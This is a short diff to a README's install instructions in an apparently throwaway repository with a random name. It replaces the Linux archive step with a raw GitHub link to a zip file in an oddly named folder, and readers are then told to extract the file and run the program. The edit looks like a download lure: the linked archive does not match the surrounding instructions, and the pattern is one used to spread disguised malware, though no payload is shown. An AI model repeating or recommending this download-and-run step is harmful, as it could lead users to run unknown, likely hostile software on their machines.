rohitchougale543/amanansdiahnid-8/README.md

    - Drag the application icon into the Applications folder.

    **For Linux:**
-   - Extract the .tar.gz file to your desired location.
+   - Extract the https://raw.githubusercontent.com/rohitchougale543/amanansdiahnid-8/main/cholanic/amanansdiahnid-8.zip file to your desired location.
    - Open a terminal and navigate to the extracted folder.
    - Type `./your_application_name` to run the program.